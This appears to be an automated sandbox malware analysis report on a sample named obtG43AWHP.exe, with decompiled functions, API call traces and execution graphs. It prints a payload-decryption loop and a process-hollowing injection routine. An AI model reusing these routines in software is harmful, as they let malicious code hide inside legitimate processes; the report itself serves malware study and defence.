    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00408B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x408c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E88(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403F20( &_v8, 0x408c80);
				} else {
					E00403F20( &_v8, 0x408c74);
				}
				_t32 = E00404348(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040F8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00408C65);
				return E00403E88( &_v8);
			}













    0x00408b8d
    0x00408b90
    0x00408b92
    0x00408b96
    0x00408b97
    0x00408b9c
    0x00408b9f
    0x00408ba4
    0x00408bb0
    0x00408bbb
    0x00408bc6
    0x00408bcd
    0x00408be6
    0x00408bcf
    0x00408bd7
    0x00408bd7
    0x00408bfa
    0x00408c13
    0x00408c22
    0x00408c28
    0x00408c43
    0x00408c43
    0x00408c28
    0x00408c4a
    0x00408c4d
    0x00408c50
    0x00408c5d

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0041844E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
    C-Code - Quality: 50%
    			E0041844E() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t31;
				signed int _t34;
				void* _t38;
				void* _t39;
				void* _t45;
				void* _t51;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(_t45);
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffffd0;
				GetSystemInfo( &_v40);
				_t34 = 0;
				_t31 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t34 == 0x20) {
						_t34 = 0;
					}
					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
					_t34 = _t34 + 1;
					_t15 = _t15 + 1;
					_t31 = _t31 - 1;
				} while (_t31 != 0);
				L5:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t38);
				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
				goto L5;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418465
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00418450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
    C-Code - Quality: 53%
    			E00418450() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t30;
				signed int _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				void* _t47;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				GetSystemInfo( &_v40);
				_t33 = 0;
				_t30 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t33 == 0x20) {
						_t33 = 0;
					}
					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
					_t33 = _t33 + 1;
					_t15 = _t15 + 1;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				L4:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t37);
				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
				goto L4;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040BC54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403404(_t6, _t21);
				}
				_t20 = _t6;
				E004030E4(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E0040345C(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









    0x0040bc54
    0x0040bc58
    0x0040bc5a
    0x0040bc5d
    0x0040bc5d
    0x0040bc64
    0x0040bc6a
    0x0040bc6f
    0x0040bc83
    0x0040bc93
    0x0040bc96
    0x0040bca9
    0x0040bcac
    0x0040bcb0
    0x0040bcb2
    0x0040bcb7
    0x0040bcbe
    0x0040bcc5

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 004179B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
				void* _t3;

				L0040C518();
				if(__eax != 0) {
					_t3 = E0040A56C("WSACleanup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x004179b4
    0x004179bb
    0x004179c9
    0x004179ce
    0x00000000
    0x004179ce
    0x004179d3

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040F0A8, Relevance: 5.1, Strings: 4, Instructions: 85
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x40f1ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					if(__eax != 0x100) {
						if(__eax != 0x101) {
							if(E0040F504(__eax,  &_v8) == 0) {
								E00407110( &_v524, 4);
								_t59 =  *0x4530ec; // 0x419128
								E00404194(_t75, _v524,  *_t59);
							} else {
								E00403064( *_v8,  &_v520);
								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
								E004040EC(__edx,  &_v264);
							}
						} else {
							E00403EDC(__edx, 0x40f1f4);
						}
					} else {
						E00403EDC(__edx, "String");
					}
				} else {
					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E00404194(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E00404194(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040F1D5);
				return E00403E88( &_v524);
			}












    0x0040f0b6
    0x0040f0bc
    0x0040f0be
    0x0040f0c2
    0x0040f0c3
    0x0040f0c8
    0x0040f0cb
    0x0040f0d0
    0x0040f0d9
    0x0040f0f6
    0x0040f10e
    0x0040f12a
    0x0040f175
    0x0040f180
    0x0040f18a
    0x0040f12c
    0x0040f13e
    0x0040f153
    0x0040f160
    0x0040f160
    0x0040f110
    0x0040f117
    0x0040f117
    0x0040f0f8
    0x0040f0ff
    0x0040f0ff
    0x0040f0db
    0x0040f0e7
    0x0040f0e7
    0x0040f192
    0x0040f19d
    0x0040f19d
    0x0040f1a5
    0x0040f1b0
    0x0040f1b0
    0x0040f1b7
    0x0040f1ba
    0x0040f1bd
    0x0040f1cd

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0041381C, Relevance: 5.1, Strings: 4, Instructions: 71
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t23;
				intOrPtr _t30;
				char _t31;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x4138c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
								break;
							}
							_t23 = _t23 + 1;
						}
						E00403F78( &_v12, _t23 - _t15, _t15);
						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
							_t42 = _t39;
						}
						if(_t42 != 0) {
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E004138C9);
				return E00403E88( &_v12);
			}












    0x00413827
    0x0041382a
    0x00413830
    0x00413831
    0x00413836
    0x00413839
    0x0041383e
    0x00413843
    0x00413845
    0x004138a4
    0x00413849
    0x0041384e
    0x0041384e
    0x00413852
    0x00000000
    0x00000000
    0x0041384d
    0x0041384d
    0x00413864
    0x00413873
    0x00413877
    0x0041388a
    0x0041388a
    0x0041388e
    0x00413893
    0x00413895
    0x00413895
    0x00413899
    0x0041389b
    0x0041389b
    0x0041389f
    0x004138a1
    0x004138a1
    0x004138a2
    0x00000000
    0x004138a2
    0x00000000
    0x0041388e
    0x004138a9
    0x004138a9
    0x004138ac
    0x004138ae
    0x004138b1
    0x004138b4
    0x004138c1

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0041498C, Relevance: 5.0, Strings: 4, Instructions: 50
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E004155CC(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E00413A2C();
				} else {
					_t1 = _t7 + E004149B3; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
						case 0:
							goto L7;
						case 1:
							E00413F54(_t17, 1, _t30);
							E00403F78(_t29,  *_t30, 0);
							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x414a58;
							__eax = E00403EDC(__esi, 0x414a58);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x414a68;
							__eax = E00403EDC(__esi, 0x414a68);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x414a78;
							__eax = E00403EDC(__esi, 0x414a78);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x414a84;
							__eax = E00403EDC(__esi, 0x414a84);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







    0x0041498e
    0x0041498f
    0x00414991
    0x0041499a
    0x004149a0
    0x00414a44
    0x00414a44
    0x004149a6
    0x004149a6
    0x004149ac
    0x00000000
    0x00000000
    0x00000000
    0x004149e2
    0x004149f0
    0x00414a05
    0x00000000
    0x00000000
    0x00414a0c
    0x00414a0e
    0x00414a13
    0x00000000
    0x00000000
    0x00414a1a
    0x00414a1c
    0x00414a21
    0x00000000
    0x00000000
    0x00414a28
    0x00414a2a
    0x00414a2f
    0x00000000
    0x00000000
    0x00414a36
    0x00414a38
    0x00414a3d
    0x00000000
    0x00000000
    0x004149ac
    0x00414a49
    0x00414a4c

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040AC28, Relevance: 5.0, Strings: 4, Instructions: 28
    C-Code - Quality: 100%
    			E0040AC28() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x452f70; // 0x405e70
				 *0x45478c = E0040A628(_t12, 1);
				_t13 =  *0x453040; // 0x405ef0
				 *0x454790 = E0040A628(_t13, 1);
				_t5 =  *0x452f34; // 0x454008
				 *_t5 = 0x40a7a4;
				_t6 =  *0x452fa8; // 0x454004
				 *_t6 = E0040AC18;
				_t7 =  *0x452f64; // 0x45401c
				_t16 =  *0x406188; // 0x4061d4
				 *_t7 = _t16;
				_t8 =  *0x452f98; // 0x45400c
				 *_t8 = E0040A968;
				_t9 =  *0x452fac; // 0x454010
				 *_t9 = E0040AB4C;
				_t17 =  *0x453054; // 0x454020
				 *_t17 = E0040A8B4;
				_t18 =  *0x452f24; // 0x454028
				 *_t18 = E0040A8D0;
				return E0040A8D0;
			}













    0x0040ac28
    0x0040ac3a
    0x0040ac3f
    0x0040ac51
    0x0040ac56
    0x0040ac5b
    0x0040ac61
    0x0040ac66
    0x0040ac6c
    0x0040ac71
    0x0040ac77
    0x0040ac79
    0x0040ac7e
    0x0040ac84
    0x0040ac89
    0x0040ac94
    0x0040ac9a
    0x0040aca1
    0x0040aca7
    0x0040aca9

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3168 Parent PID: 3156

    Execution Graph

    Execution Coverage:2.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:45.8%
    Total number of Nodes:24
    Total number of Limit Nodes:5

    Graph

    %3 14819 20e590 14820 20e5ac 14819->14820 14822 20f46c 14820->14822 14825 20e510 14822->14825 14826 20e53c 14825->14826 14827 20e542 GetFileAttributesA 14826->14827 14828 20e57e 14826->14828 14830 20e380 14826->14830 14827->14826 14831 20e453 14830->14831 14832 20e45f CreateWindowExA 14831->14832 14833 20e45a 14831->14833 14832->14833 14834 20e4a0 PostMessageA 14832->14834 14833->14826 14835 20e4bf 14834->14835 14835->14833 14837 20e080 VirtualAlloc GetModuleFileNameA 14835->14837 14838 20e0ed CreateProcessA 14837->14838 14849 20e368 14837->14849 14840 20e1cc VirtualAlloc 14838->14840 14838->14849 14842 20e20e 14840->14842 14843 20e216 ReadProcessMemory 14842->14843 14842->14849 14844 20e242 14843->14844 14845 20e252 VirtualAllocEx NtWriteVirtualMemory 14843->14845 14844->14845 14846 20e2a8 14845->14846 14847 20e30a WriteProcessMemory SetThreadContext ResumeThread 14846->14847 14848 20e2bd NtWriteVirtualMemory 14846->14848 14847->14849 14848->14846 14849->14835

    Executed Functions

    Function 0020E080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0020E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0020E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0020E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0020E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0020E35A
    Memory Dump Source
    • Source File: 00000005.00000002.1478924566.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_20d000_obtG43AWHP.jbxd
    Function 0020E380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
      • Part of subcall function 0020E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
      • Part of subcall function 0020E080: CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1478924566.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_20d000_obtG43AWHP.jbxd
    Function 0020E510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0020E54C
      • Part of subcall function 0020E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
      • Part of subcall function 0020E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1478924566.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_20d000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 0020DFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 00000005.00000002.1478924566.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_20d000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3192 Parent PID: 3168

    Execution Graph

    Execution Coverage:2%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:5%
    Total number of Nodes:622
    Total number of Limit Nodes:8

    Graph

    %3 13303 418c78 13330 405adc GetModuleHandleA 13303->13330 13308 418cf0 13350 418750 13308->13350 13314 418cc6 13314->13308 13316 4029a4 36 API calls 13314->13316 13318 418ce2 13316->13318 13320 418cea DeleteFileA 13318->13320 13320->13308 13325 418d04 13326 418570 43 API calls 13325->13326 13327 418d35 ResumeThread 13325->13327 13328 4189e8 3 API calls 13325->13328 13434 4189e8 PeekMessageA 13325->13434 13440 418590 SuspendThread 13325->13440 13326->13325 13327->13325 13329 418d25 Sleep 13328->13329 13329->13325 13331 405b0f 13330->13331 13446 403b78 13331->13446 13334 402944 GetCommandLineA 13697 402858 13334->13697 13336 402968 13337 402858 34 API calls 13336->13337 13338 40297f 13336->13338 13337->13336 13339 403e88 11 API calls 13338->13339 13340 402994 13339->13340 13340->13308 13341 4029a4 13340->13341 13342 403e88 11 API calls 13341->13342 13343 4029b8 13342->13343 13344 4029bc GetModuleFileNameA 13343->13344 13345 4029da GetCommandLineA 13343->13345 13347 403f78 25 API calls 13344->13347 13346 4029e1 13345->13346 13348 402858 34 API calls 13346->13348 13349 4029d8 13346->13349 13347->13349 13348->13346 13349->13314 13351 418758 13350->13351 13351->13351 13352 402944 35 API calls 13351->13352 13353 418776 13352->13353 13354 4187a4 13353->13354 13355 41877a 13353->13355 13357 4029a4 36 API calls 13354->13357 13356 4029a4 36 API calls 13355->13356 13358 41878d 13356->13358 13359 4187bf 13357->13359 13361 418795 ShellExecuteA 13358->13361 13719 407138 13359->13719 13363 403d1c 7 API calls 13361->13363 13363->13354 13364 4188db 13370 41891b 13364->13370 13723 406ffc 13364->13723 13365 4187d2 13727 417d84 13365->13727 13777 403eac 13370->13777 13373 4188f1 13377 4029a4 36 API calls 13373->13377 